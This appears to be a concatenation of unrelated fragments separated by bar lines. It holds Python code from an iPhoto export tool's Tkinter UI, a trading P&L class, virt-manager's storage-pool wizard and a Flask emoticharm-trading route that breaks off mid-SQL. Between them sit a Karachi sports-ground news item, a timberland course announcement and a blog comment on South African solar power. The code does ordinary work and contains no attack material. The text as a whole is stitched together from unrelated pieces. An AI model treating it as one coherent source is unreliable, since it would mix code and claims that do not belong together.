if config.has_option(s, 'folderhints'):
self.folderhints = config.getboolean(s, 'folderhints')
if config.has_option(s, 'captiontemplate'):
self.nametemplate = unicode(config.get(s, 'captiontemplate'))
if config.has_option(s, 'nametemplate'):
self.nametemplate = unicode(config.get(s, 'nametemplate'))
if config.has_option(s, 'size'):
self.size = config.get(s, 'size')
if config.has_option(s, 'picasa'):
self.picasa = config.getboolean(s, 'picasa')
if config.has_option(s, 'movies'):
self.movies = config.getboolean(s, 'movies')
if config.has_option(s, 'originals'):
self.originals = config.getboolean(s, 'originals')
if config.has_option(s, 'iptc'):
self.iptc = config.getint(s, 'iptc')
if config.has_option(s, 'gps'):
self.gps = config.getboolean(s, 'gps')
if config.has_option(s, 'faces'):
self.faces = config.getboolean(s, 'faces')
if config.has_option(s, 'facealbums'):
self.facealbums = config.getboolean(s, 'facealbums')
if config.has_option(s, 'facealbum_prefix'):
self.facealbum_prefix = config.get(s, 'facealbum_prefix')
if config.has_option(s, 'face_keywords'):
self.face_keywords = config.getboolean(s, 'face_keywords')
return True
def save(self):
"""Saves the current options into a file."""
config = ConfigParser.RawConfigParser()
s = 'Export1'
config.add_section(s)
config.set(s, 'iphoto', self.iphoto)
config.set(s, 'export', self.export)
config.set(s, 'albums', su.fsenc(self.albums))
config.set(s, 'events', su.fsenc(self.events))
config.set(s, 'smarts', su.fsenc(self.smarts))
config.set(s, 'foldertemplate', su.fsenc(self.foldertemplate))
config.set(s, 'nametemplate', su.fsenc(self.nametemplate))
config.set(s, 'captiontemplate', su.fsenc(self.captiontemplate))
config.set(s, 'delete', self.delete)
config.set(s, 'update', self.update)
config.set(s, 'link', self.link)
config.set(s, 'dryrun', self.dryrun)
config.set(s, 'folderhints', self.folderhints)
config.set(s, 'captiontemplate', self.captiontemplate)
config.set(s, 'nametemplate', self.nametemplate)
config.set(s, 'size', self.size)
config.set(s, 'picasa', self.picasa)
config.set(s, 'movies', self.movies)
config.set(s, 'originals', self.originals)
config.set(s, 'iptc', self.iptc)
config.set(s, 'gps', self.gps)
config.set(s, 'faces', self.faces)
config.set(s, 'facealbums', self.facealbums)
config.set(s, 'facealbum_prefix', self.facealbum_prefix)
config.set(s, 'face_keywords', self.face_keywords)
config_folder = os.path.split(_CONFIG_PATH)[0]
if not os.path.exists(config_folder):
os.makedirs(config_folder)
configfile = open(_CONFIG_PATH, 'wb')
config.write(configfile)
configfile.close()
def can_export(self):
if (not self.albums.get() and not self.events.get() and
not self.smarts.get()):
tkMessageBox.showerror(
"Export Error",
("Need to specify at least one event, album, or smart album "
"for exporting."))
return False
return True
def run_export(self, dry_run):
mode = "export"
if dry_run:
mode = "dry_run"
self.launch_export(mode)
def launch_export(self, mode):
"""Launch an export operation in a new thread, to not block the UI.
Args:
mode - name of operation to run, "library", "dry_run", or "export".
"""
self.text.delete('1.0', END)
self.browse_library_button.config(state=DISABLED)
export_thread = threading.Thread(target=self.export_thread,
args=(mode,))
export_thread.start()
def export_thread(self, mode):
"""Run an export operation in a thread, to not block the UI.
Args:
mode - name of operation to run, "library", "dry_run", or "export".
"""
try:
# First, load the iPhoto library.
library_path = su.expand_home_folder(self.iphoto_library.get())
album_xml_file = iphotodata.get_album_xmlfile(library_path)
data = iphotodata.get_iphoto_data(album_xml_file)
msg = "Version %s library with %d images" % (
data.applicationVersion, len(data.images))
self.write(msg + '\n')
if mode == "library":
# If we just need to check the library, we are done here.
self.thread_queue.put(("done", (True, mode, msg)))
return
# Do the actual export.
export_folder = su.expand_home_folder(self.export_folder.get())
args = ['Phoshare.py', '--export', '"' + export_folder + '"']
options = self.Options()
options.iphoto = self.iphoto_library.get()
args.extend(['--iphoto', '"' + options.iphoto + '"'])
options.export = self.export_folder.get()
options.dryrun = mode == "dry_run"
options.albums = self.albums.get()
if options.albums:
args.extend(['--albums', '"' + options.albums + '"'])
options.events = self.events.get()
if options.events:
args.extend(['--events', '"' + options.events + '"'])
options.smarts = self.smarts.get()
if options.smarts:
args.extend(['--smarts', '"' + options.smarts + '"'])
options.foldertemplate = unicode(self.foldertemplate.get())
if options.foldertemplate:
args.extend(['--foldertemplate', '"' +
options.foldertemplate + '"'])
options.nametemplate = unicode(self.nametemplate.get())
if options.nametemplate:
args.extend(['--nametemplate', '"' +
options.nametemplate + '"'])
options.captiontemplate = unicode(self.captiontemplate.get())
if options.captiontemplate:
args.extend(['--captiontemplate', '"' +
options.captiontemplate + '"'])
options.ignore = [] # TODO
options.update = self.update_var.get() == 1
if options.update:
args.append('--update')
options.delete = self.delete_var.get() == 1
if options.delete:
args.append('--delete')
options.originals = self.originals_var.get() == 1
if options.originals:
args.append('--originals')
options.link = self.link_var.get() == 1
if options.link:
args.append('--link')
options.folderhints = self.folder_hints_var.get() == 1
if options.folderhints:
args.append('--folderhints')
options.faces = self.faces_var.get() == 1
if options.faces:
args.append('--faces')
options.face_keywords = self.face_keywords_var.get() == 1
if options.face_keywords:
args.append('--face_keywords')
if self.iptc_all_var.get() == 1:
options.iptc = 2
args.append('--iptcall')
elif self.iptc_var.get() == 1:
options.iptc = 1
args.append('--iptc')
else:
options.iptc = 0
options.gps = self.gps_var.get()
if options.gps:
args.append('--gps')
options.facealbums = self.face_albums_var.get() == 1
if options.facealbums:
args.append('--facealbums')
options.facealbum_prefix = self.face_albums_text.get()
if options.facealbum_prefix:
args.append('--facealbum_prefix')
exclude = None # TODO
options.save()
print " ".join(args)
self.logging_handler.setLevel(logging.DEBUG if self.verbose_var.get() else logging.INFO)
self.active_library = phoshare_main.ExportLibrary(export_folder)
phoshare_main.export_iphoto(self.active_library, data, exclude,
options)
self.thread_queue.put(("done", (True, mode, '')))
except Exception, e: # IGNORE:W0703
self.thread_queue.put(("done",
(False, mode,
str(e) + '\n\n' + traceback.format_exc())))
def thread_checker(self, delay_ms=100): # 10x per second
"""Processes any queued up messages in the thread queue. Once the queue
is empty, schedules another check after a short delay.
This method runs in the main thread, and therefore, can update the UI.
"""
writes = 0
while True:
try:
(callback, args) = self.thread_queue.get(block=False)
if callback == "write":
self.write_progress(args)
writes += 1
if writes >= 10:
# After 10 consecutive writes to the progress area,
# update the UI so that the user can see the progress.
self.update()
writes = 0
continue
# Must be a "done" message, with a (success, mode, msg)
# argument.
success = args[0]
mode = args[1]
msg = args[2]
if success:
self.write_progress("Done!")
else:
self.write_progress("Error: " + msg)
if mode == "library":
self.set_library_status(success, msg)
else:
self.export_done()
except Queue.Empty:
break
# Check the queue again after a short delay.
self.after(delay_ms, self.thread_checker)
def write(self, text):
"""Writes text to the progress area of the UI. Uses the thread queue,
and can be called from a non-UI thread."""
self.thread_queue.put(("write", text))
def writelines(self, lines): # lines already have '\n'
"""Writes text to the progress area of the UI. Uses the thread queue,
and can be called from a non-UI thread."""
for line in lines:
self.write(line)
def main():
"""Main routine for phoshare_ui. Typically launched from Phoshare.py"""
app = ExportApp()
app.master.title(phoshare_version.PHOSHARE_VERSION)
sys.stdout = app
try:
app.init()
app.mainloop()
except Exception, e:
f = cStringIO.StringIO()
traceback.print_exc(file=f)
app.write_progress('--- Fatal Error ---\n')
app.write_progress('Please include the information below in your bug'
' report.\n\n')
app.write_progress('%s\n\n%s\n' % (str(e), f.getvalue()))
app.write_progress('\n'.join(os.uname()))
app.write_progress('\nMac version: %s\n' % (platform.mac_ver()[0]))
app.write_progress('Python version: %s\n' % (platform.python_version()))
tkMessageBox.showerror(
'Phoshare Error',
'Phoshare encountered a serious problem and will shut down. '
'Please copy the information shown in the application output panel '
'when reporting this problem at\n'
'http://code.google.com/p/phoshare/issues/entry\n\n%s.' % (str(e)))
raise e
if __name__ == "__main__":
main()
|
The city government will install Astroturf at the hockey ground of North Karachi town with a cost of Rs25 million, said City Nazim Syed Mustafa Kamal.
Talking to journalists after inaugurating a cricket ground in sector 11-E, North Karachi on Sunday, the Nazim said that the construction of more than 20 floodlight stadiums and cricket academies was also under way in all 18 towns of the city.
Provincial Sports Minister, Dr Muhammad Ali Shah; Minister for Youth Affairs, Sindh Faisal Subzwari; Town Nazim North Karachi, Akhtar Hussain; Town Nazim North Nazimabad, Mumtaz Hameed; prominent sports personalities and a large number of people were also present on the occasion.
Kamal said that the Haq Parast city government had started implementing the plan to construct cricket stadiums with floodlights in every town, adding that national cricket experts will be coordinated with in this project. He also directed the North Karachi Town Nazim to construct a sports academy and sports complex at the site adjacent to the cricket ground. He said that the complex should also have a hockey ground, which would be the second Astroturf hockey ground constructed by the city government in Karachi.
The city Nazim also asked Faisal Subzwari to provide technical coordination for the establishment of a sports academy in North Karachi.
Earlier, thousands of people including sports lovers greeted Kamal and Subzwari with a warm welcome when they arrived at the ground.
An exhibition cricket match was also supervised by the organisers after the inauguration of ground. The match was played between City Nazim XI and N. Karachi Town XI. Kamal and Subzwari represented the City Nazim XI and also opened the innings for their team.
North Karachi Town Eleven had Shah, Hussain and Hameed as the main players. Other cricketers also played in the match. A good number of spectators enjoyed the exhibition match at the newly-inaugurated ground in North Karachi.
|
import logging
import math
import numpy
class ZeroFeeModel(object):
def compute_fees(self, quantity, price):
return 0.
class InteractiveBrokersStockUSFeeModel(object):
def compute_fees(self, quantity, price):
max_fees = quantity * price * 0.5 / 100
return max(min(max_fees, 0.005 * quantity), 1.)
class AverageCostProfitAndLoss(object):
"""
Computes P&L based on weighted average cost method.
"""
def __init__(self, quantity=0, cost=0., realized_pnl=0):
self._quantity = quantity
self._cost = cost
self._realized_pnl = realized_pnl
self.fee_model = InteractiveBrokersStockUSFeeModel()
@property
def realized_pnl(self):
return self._realized_pnl
@property
def acquisition_cost(self):
return self._cost
@property
def quantity(self):
return self._quantity
@property
def average_price(self):
if self._quantity == 0:
return numpy.NaN
return self._cost / self._quantity
def calc_market_value(self, current_price):
return self.quantity * current_price
def calc_unrealized_pnl(self, current_price):
return self.calc_market_value(current_price) - self.acquisition_cost
def calc_total_pnl(self, current_price):
return self.realized_pnl + self.calc_unrealized_pnl(current_price)
def add_fill(self, fill_qty, fill_price):
"""
Adding a fill to the record updates the P&L values.
:param fill_qty:
:param fill_price:
:param fees: a dict containing fees that apply on the trade
:return:
"""
logging.debug('adding fill: %s at %s (amount: %.2f)', fill_qty, fill_price, fill_qty * fill_price)
old_qty = self._quantity
if old_qty == 0:
self._quantity = fill_qty
self._cost = fill_qty * fill_price
else:
old_cost = self._cost
old_realized = self._realized_pnl
closing_qty = 0
opening_qty = fill_qty
if math.copysign(1, old_qty) != math.copysign(1, fill_qty):
closing_qty = min(abs(old_qty), abs(fill_qty)) * math.copysign(1, fill_qty)
opening_qty = fill_qty - closing_qty
self._quantity = old_qty + fill_qty
self._cost = old_cost + (opening_qty * fill_price) + (closing_qty * old_cost / old_qty)
self._realized_pnl = old_realized + closing_qty * (old_cost / old_qty - fill_price)
self._realized_pnl -= self.fee_model.compute_fees(fill_qty, fill_price)
|
The Alabama Chapter of the Realtors Land Institute is proud to offer an outstanding education and networking opportunity for real estate brokers, licensees, and timberland owners.
This 2-day REALTORS Land Institute (RLI) Land University course introduces participants to everything needed to successfully conduct timberland transactions. Whether a seasoned land professional or a commercial/residential agent looking to expand their business by taking on new clients this timberland course is a worthwhile investment.
All course materials, continental breakfast, lunch and snacks on both dates.
This course meets the 16 hour elective requirements to go toward earning the coveted Accredited Land Consultant (ALC) designation.
Please pre-register so we have an accurate count for course materials and meals.
The information included in the materials and provided by presenters or participants is for informational purposes only and should not be a substitute for legal, accounting or other professional services. Realtor’s Land Institute and its officers, directors and employees do not warrant that the use of the materials would be adequate to discharge the legal or professional liability of participants in the conduct of their business operations. With regard to the information provided, neither Realtor’s Land Institute nor any of its directors, officers or employees, makes any warranty, express or implied, including the warranties of merchantability and fitness for a particular purpose, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. The views and opinions expressed do not necessarily state or reflect those of Realtor’s Land Institute nor is any information meant to be construed as an endorsement of any product or service.
|
#
# Copyright (C) 2008 Red Hat, Inc.
# Copyright (C) 2008 Cole Robinson <crobinso@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import gtk
import copy
import logging
from virtManager import util
from virtManager.baseclass import vmmGObjectUI
from virtManager.asyncjob import vmmAsyncJob
from virtinst import Storage
PAGE_NAME = 0
PAGE_FORMAT = 1
_comboentry_xml = """
<interface>
<object class="GtkComboBoxEntry" id="pool-source-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_source_path_changed"/>
<signal name="focus" handler="on_pool_source_path_focus"/>
</object>
<object class="GtkComboBoxEntry" id="pool-target-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_target_path_changed"/>
<signal name="focus_in_event" handler="on_pool_target_path_focus_in_event"/>
</object>
</interface>
"""
class vmmCreatePool(vmmGObjectUI):
def __init__(self, conn):
vmmGObjectUI.__init__(self,
"vmm-create-pool.ui",
"vmm-create-pool")
self.conn = conn
self._pool = None
self._pool_class = Storage.StoragePool
self.window.add_from_string(_comboentry_xml)
self.widget("pool-source-box").pack_start(
self.widget("pool-source-path"))
self.widget("pool-target-box").pack_start(
self.widget("pool-target-path"))
self.window.connect_signals({
"on_pool_forward_clicked" : self.forward,
"on_pool_back_clicked" : self.back,
"on_pool_cancel_clicked" : self.close,
"on_vmm_create_pool_delete_event" : self.close,
"on_pool_finish_clicked" : self.forward,
"on_pool_pages_change_page" : self.page_changed,
"on_pool_source_button_clicked" : self.browse_source_path,
"on_pool_target_button_clicked" : self.browse_target_path,
"on_pool_name_activate": self.forward,
"on_pool_hostname_activate" : self.hostname_changed,
"on_pool_iqn_chk_toggled": self.iqn_toggled,
"on_pool_name_focus_in_event": (self.update_doc, "name",
"pool-info1"),
# I cannot for the life of me get a combobox to abide
# focus-in, button-pressed, motion-over, etc.
"on_pool_type_focus": (self.update_doc, "type", "pool-info1"),
"on_pool_type_changed": (self.update_doc_changed, "type",
"pool-info1"),
"on_pool_format_focus": (self.update_doc, "format", "pool-info2"),
"on_pool_format_changed": (self.update_doc_changed, "format",
"pool-info2"),
"on_pool_target_path_focus_in_event": (self.update_doc,
"target_path",
"pool-info2"),
"on_pool_target_path_focus": (self.update_doc, "target_path",
"pool-info2"),
"on_pool_target_path_changed": (self.update_doc_changed,
"target_path",
"pool-info2"),
"on_pool_source_path_focus_in_event": (self.update_doc,
"source_path",
"pool-info2"),
"on_pool_source_path_focus": (self.update_doc, "source_path",
"pool-info2"),
"on_pool_source_path_changed": (self.update_doc_changed,
"source_path",
"pool-info2"),
"on_pool_hostname_focus_in_event": (self.update_doc, "host",
"pool-info2"),
"on_pool_build_focus_in_event": (self.update_build_doc),
"on_pool_iqn_focus_in_event": (self.update_doc, "iqn",
"pool-info2"),
})
self.bind_escape_key_close()
# XXX: Help docs useless/out of date
self.widget("pool-help").hide()
finish_img = gtk.image_new_from_stock(gtk.STOCK_QUIT,
gtk.ICON_SIZE_BUTTON)
self.widget("pool-finish").set_image(finish_img)
self.set_initial_state()
def show(self, parent):
logging.debug("Showing new pool wizard")
self.reset_state()
self.topwin.set_transient_for(parent)
self.topwin.present()
def close(self, ignore1=None, ignore2=None):
logging.debug("Closing new pool wizard")
self.topwin.hide()
return 1
def _cleanup(self):
self.conn = None
self._pool = None
def set_initial_state(self):
self.widget("pool-pages").set_show_tabs(False)
type_list = self.widget("pool-type")
type_model = gtk.ListStore(str, str)
type_list.set_model(type_model)
text1 = gtk.CellRendererText()
type_list.pack_start(text1, True)
type_list.add_attribute(text1, 'text', 1)
format_list = self.widget("pool-format")
format_model = gtk.ListStore(str, str)
format_list.set_model(format_model)
text2 = gtk.CellRendererText()
format_list.pack_start(text2, False)
format_list.add_attribute(text2, 'text', 1)
# Target path combo box entry
target_list = self.widget("pool-target-path")
# target_path, Label, pool class instance
target_model = gtk.ListStore(str, str, object)
target_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
target_list.set_model(target_model)
target_list.set_text_column(0)
target_list.child.connect("focus-in-event", self.update_doc,
"target_path", "pool-info2")
# Source path combo box entry
source_list = self.widget("pool-source-path")
# source_path, Label, pool class instance
source_model = gtk.ListStore(str, str, object)
source_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
source_list.set_model(source_model)
source_list.set_text_column(0)
source_list.child.connect("focus-in-event", self.update_doc,
"source_path", "pool-info2")
self.populate_pool_type()
self.widget("pool-info-box1").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
self.widget("pool-info-box2").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
def reset_state(self):
self.widget("pool-pages").set_current_page(0)
self.widget("pool-forward").show()
self.widget("pool-finish").hide()
self.widget("pool-back").set_sensitive(False)
self.widget("pool-name").set_text("")
self.widget("pool-name").grab_focus()
self.widget("pool-type").set_active(0)
self.widget("pool-target-path").child.set_text("")
self.widget("pool-source-path").child.set_text("")
self.widget("pool-hostname").set_text("")
self.widget("pool-iqn-chk").set_active(False)
self.widget("pool-iqn-chk").toggled()
self.widget("pool-iqn").set_text("")
self.widget("pool-format").set_active(-1)
self.widget("pool-build").set_sensitive(True)
self.widget("pool-build").set_active(False)
def hostname_changed(self, ignore):
# If a hostname was entered, try to lookup valid pool sources.
self.populate_pool_sources()
def iqn_toggled(self, src):
self.widget("pool-iqn").set_sensitive(src.get_active())
def populate_pool_type(self):
model = self.widget("pool-type").get_model()
model.clear()
types = Storage.StoragePool.get_pool_types()
types.sort()
for typ in types:
model.append([typ, "%s: %s" %
(typ, Storage.StoragePool.get_pool_type_desc(typ))])
def populate_pool_format(self, formats):
model = self.widget("pool-format").get_model()
model.clear()
for f in formats:
model.append([f, f])
def populate_pool_sources(self):
source_list = self.widget("pool-source-path")
source_model = source_list.get_model()
source_model.clear()
target_list = self.widget("pool-target-path")
target_model = target_list.get_model()
target_model.clear()
use_list = source_list
use_model = source_model
entry_list = []
if self._pool.type == Storage.StoragePool.TYPE_SCSI:
entry_list = self.list_scsi_adapters()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
pool_list = self.list_pool_sources()
entry_list = map(lambda p: [p.target_path, p.target_path, p],
pool_list)
use_list = target_list
use_model = target_model
elif self._pool.type == Storage.StoragePool.TYPE_DISK:
entry_list = self.list_disk_devs()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_NETFS:
host = self.get_config_host()
if host:
pool_list = self.list_pool_sources(host=host)
entry_list = map(lambda p: [p.source_path, p.source_path, p],
pool_list)
use_list = source_list
use_model = source_model
for e in entry_list:
use_model.append(e)
if entry_list:
use_list.set_active(0)
def list_scsi_adapters(self):
scsi_hosts = self.conn.get_nodedevs("scsi_host")
host_list = map(lambda dev: dev.host, scsi_hosts)
clean_list = []
for h in host_list:
tmppool = copy.copy(self._pool)
name = "host%s" % h
tmppool.source_path = name
entry = [name, name, tmppool]
if name not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_disk_devs(self):
devs = self.conn.get_nodedevs("storage")
devlist = []
for dev in devs:
if dev.drive_type != "disk" or not dev.block:
continue
devlist.append(dev.block)
devlist.sort()
clean_list = []
for dev in devlist:
tmppool = copy.copy(self._pool)
tmppool.source_path = dev
entry = [dev, dev, tmppool]
if dev not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_pool_sources(self, host=None):
name = self.get_config_name()
pool_type = self._pool.type
plist = []
try:
plist = Storage.StoragePool.pool_list_from_sources(self.conn.vmm,
name, pool_type,
host=host)
except Exception:
logging.exception("Pool enumeration failed")
return plist
def show_options_by_pool(self):
def show_row(base, do_show):
self.widget(base + "-label").set_property("visible", do_show)
self.widget(base + "-box").set_property("visible", do_show)
src = hasattr(self._pool, "source_path")
src_b = src and not self.conn.is_remote()
tgt = hasattr(self._pool, "target_path")
tgt_b = tgt and not self.conn.is_remote()
host = hasattr(self._pool, "host")
fmt = hasattr(self._pool, "formats")
iqn = hasattr(self._pool, "iqn")
builddef, buildsens = self.get_build_default()
# Source path broswing is meaningless for net pools
if self._pool.type in [Storage.StoragePool.TYPE_NETFS,
Storage.StoragePool.TYPE_ISCSI,
Storage.StoragePool.TYPE_SCSI]:
src_b = False
show_row("pool-target", tgt)
show_row("pool-source", src)
show_row("pool-hostname", host)
show_row("pool-format", fmt)
show_row("pool-build", buildsens)
show_row("pool-iqn", iqn)
self.widget("pool-target-path").child.set_text(self._pool.target_path)
self.widget("pool-target-button").set_sensitive(tgt_b)
self.widget("pool-source-button").set_sensitive(src_b)
self.widget("pool-build").set_active(builddef)
self.widget("pool-format").set_active(-1)
if fmt:
self.populate_pool_format(getattr(self._pool, "formats"))
self.widget("pool-format").set_active(0)
self.populate_pool_sources()
def get_config_type(self):
typ = self.widget("pool-type")
if typ.get_active_iter() != None:
return typ.get_model().get_value(typ.get_active_iter(), 0)
return None
def get_config_name(self):
return self.widget("pool-name").get_text()
def get_config_target_path(self):
src = self.widget("pool-target-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text()
def get_config_source_path(self):
src = self.widget("pool-source-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text().strip()
def get_config_host(self):
host = self.widget("pool-hostname")
if host.get_property("sensitive"):
return host.get_text().strip()
return None
def get_config_format(self):
format_combo = self.widget("pool-format")
model = format_combo.get_model()
if format_combo.get_active_iter() != None:
model = format_combo.get_model()
return model.get_value(format_combo.get_active_iter(), 0)
return None
def get_config_iqn(self):
iqn = self.widget("pool-iqn")
if iqn.get_property("sensitive") and iqn.get_property("visible"):
return iqn.get_text().strip()
return None
def get_build_default(self):
""" Return (default value, whether build option can be changed)"""
if not self._pool:
return (False, False)
if self._pool.type in [Storage.StoragePool.TYPE_DIR,
Storage.StoragePool.TYPE_FS,
Storage.StoragePool.TYPE_NETFS]:
# Building for these simply entails creating a directory
return (True, False)
elif self._pool.type in [Storage.StoragePool.TYPE_LOGICAL,
Storage.StoragePool.TYPE_DISK]:
# This is a dangerous operation, anything (False, True)
# should be assumed to be one.
return (False, True)
else:
return (False, False)
def browse_source_path(self, ignore1=None):
source = self._browse_file(_("Choose source path"),
startfolder="/dev", foldermode=False)
if source:
self.widget("pool-source-path").child.set_text(source)
def browse_target_path(self, ignore1=None):
target = self._browse_file(_("Choose target directory"),
startfolder="/var/lib/libvirt",
foldermode=True)
if target:
self.widget("pool-target-path").child.set_text(target)
def forward(self, ignore=None):
notebook = self.widget("pool-pages")
try:
if(self.validate(notebook.get_current_page()) != True):
return
if notebook.get_current_page() == PAGE_FORMAT:
self.finish()
else:
self.widget("pool-forward").grab_focus()
notebook.next_page()
except Exception, e:
self.err.show_err(_("Uncaught error validating input: %s") % str(e))
return
def back(self, ignore=None):
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-pages").prev_page()
def finish(self):
self.topwin.set_sensitive(False)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.WATCH))
build = self.widget("pool-build").get_active()
progWin = vmmAsyncJob(self._async_pool_create, [build],
_("Creating storage pool..."),
_("Creating the storage pool may take a "
"while..."),
self.topwin)
error, details = progWin.run()
self.topwin.set_sensitive(True)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.TOP_LEFT_ARROW))
if error:
error = _("Error creating pool: %s") % error
self.err.show_err(error,
details=details)
else:
self.close()
def _async_pool_create(self, asyncjob, build):
newconn = None
# Open a seperate connection to install on since this is async
newconn = util.dup_lib_conn(self._pool.conn)
meter = asyncjob.get_meter()
self._pool.conn = newconn
logging.debug("Starting backround pool creation.")
poolobj = self._pool.install(create=True, meter=meter, build=build)
poolobj.setAutostart(True)
logging.debug("Pool creation succeeded")
def page_changed(self, notebook_ignore, page_ignore, page_number):
if page_number == PAGE_NAME:
self.widget("pool-back").set_sensitive(False)
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-forward").grab_focus()
elif page_number == PAGE_FORMAT:
self.widget("pool-back").set_sensitive(True)
self.widget("pool-finish").show()
self.widget("pool-finish").grab_focus()
self.widget("pool-forward").hide()
self.show_options_by_pool()
def get_pool_to_validate(self):
"""
Return a pool instance to use for parameter assignment validation.
For most pools this will be the one we built after step 1, but for
pools we find via FindPoolSources, this will be different
"""
source_list = self.widget("pool-source-path")
target_list = self.widget("pool-target-path")
pool = copy.copy(self._pool)
if source_list.get_active() != -1:
pool = source_list.get_model()[source_list.get_active()][2]
elif target_list.get_active() != -1:
pool = target_list.get_model()[target_list.get_active()][2]
return pool
def validate(self, page):
if page == PAGE_NAME:
typ = self.get_config_type()
name = self.get_config_name()
conn = self.conn.vmm
try:
self._pool_class = Storage.StoragePool.get_pool_class(typ)
self._pool = self._pool_class(name=name, conn=conn)
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
return True
elif page == PAGE_FORMAT:
target = self.get_config_target_path()
host = self.get_config_host()
source = self.get_config_source_path()
fmt = self.get_config_format()
iqn = self.get_config_iqn()
tmppool = self.get_pool_to_validate()
try:
tmppool.target_path = target
if host:
tmppool.host = host
if source:
tmppool.source_path = source
if fmt:
tmppool.format = fmt
if iqn:
tmppool.iqn = iqn
tmppool.get_xml_config()
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
buildval = self.widget("pool-build").get_active()
buildsen = (self.widget("pool-build").get_property("sensitive") and
self.widget("pool-build-box").get_property("visible"))
if buildsen and buildval:
ret = self.err.yes_no(_("Building a pool of this type will "
"format the source device. Are you "
"sure you want to 'build' this pool?"))
if not ret:
return ret
self._pool = tmppool
return True
def update_doc(self, ignore1, ignore2, param, infobox):
doc = self._build_doc_str(param)
self.widget(infobox).set_markup(doc)
def update_build_doc(self, ignore1, ignore2):
doc = ""
docstr = ""
if self._pool.type == Storage.StoragePool.TYPE_DISK:
docstr = _("Format the source device.")
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
docstr = _("Create a logical volume group from the source device.")
if docstr:
doc = self._build_doc_str("build", docstr)
self.widget("pool-info2").set_markup(doc)
def update_doc_changed(self, ignore1, param, infobox):
# Wrapper for update_doc and 'changed' signal
self.update_doc(None, None, param, infobox)
def _build_doc_str(self, param, docstr=None):
doc = ""
doctmpl = "<i><u>%s</u>: %s</i>"
prettyname = param.replace("_", " ").capitalize()
if docstr:
doc = doctmpl % (prettyname, docstr)
elif hasattr(self._pool_class, param):
doc = doctmpl % (prettyname,
getattr(self._pool_class, param).__doc__)
return doc
def _browse_file(self, dialog_name, startfolder=None, foldermode=False):
mode = gtk.FILE_CHOOSER_ACTION_OPEN
if foldermode:
mode = gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER
return util.browse_local(self.topwin, dialog_name, self.conn,
dialog_type=mode,
start_folder=startfolder)
vmmGObjectUI.type_register(vmmCreatePool)
|
South Africa is to unveil plans this week for what it claims will be the world's biggest solar power plant – a radical step in a coal-dependent country where one in six people still lacks electricity.
The project, expected to cost up to R200bn (£18.42bn), would aim by the end of its first decade to achieve an annual output of five gigawatts (GW)* of electricity - currently one-tenth of South Africa's energy needs.
Giant mirrors and solar panels would be spread across the Northern Cape province, which the government says is among the sunniest 3% of regions in the world with minimal cloud or rain.
General aversions to monopolies (and certain subsidies) aside, I've been pretty positive about CSP (concentrated solar power) in that part of the country for a while. One concern I do have about these big solar projects though, is that they tend to be in - well - hot and dry places. This becomes problematic given that you need pretty substantial amounts of water for cooling (with thermal plants) and even cleaning (for photovoltaics). I guess it was inevitable that they've got their eyes set on the Orange River for this one... I'm interested to see what the EIA throws up.
|
from app import db
from ..emoticharms.models import UserPack, Pack
from flask import Blueprint, render_template, abort
from forms import UserPacksForm, PackQuantityField
from ..util import valid_ti5_ticket
from flask.ext.login import login_required, current_user
from ..users.models import User
emoticharms = Blueprint("emoticharms", __name__, url_prefix="/emoticharms")
@emoticharms.route('/collection/', methods=['GET', 'POST'])
@login_required
@valid_ti5_ticket
def collection():
form = UserPacksForm()
if form.validate_on_submit():
print 'submitted'
for field in form:
if not isinstance(field, PackQuantityField):
continue
user_pack = UserPack.query.filter_by(pack_id=field.pack.id, user_id=current_user.account_id).first()
if user_pack is None:
user_pack = UserPack(field.pack.id, current_user.account_id, field.data)
db.session.add(user_pack)
else:
user_pack.quantity = field.data
db.session.commit()
form_data = {
user_pack.pack.normalized_name: user_pack.quantity
for user_pack in UserPack.query.filter_by(user=current_user).all()
}
print form_data
form = UserPacksForm(data=form_data)
return render_template('emoticharms/collection.html', form=form)
@emoticharms.route('/matches/')
@login_required
@valid_ti5_ticket
def matches():
"""
Match with other users by the count of packs the other party has that we want,
and that the other party wants and we have. Ordered by the most amount of combined packs matched.
"""
# Get ids of own packs where we own 0 (we need)
wanted_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0).all()
spare_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity > 1).all()
wanted_pack_ids = [unicode(user_pack.pack_id) for user_pack in wanted_packs]
spare_pack_ids = [unicode(user_pack.pack_id) for user_pack in spare_packs]
# Get ids of owned packs that are greater than 1 (our dupes)
matches_query = db.engine.execute("""
SELECT
account_id,
SUM(spare_count) as other_user_has_spare_count,
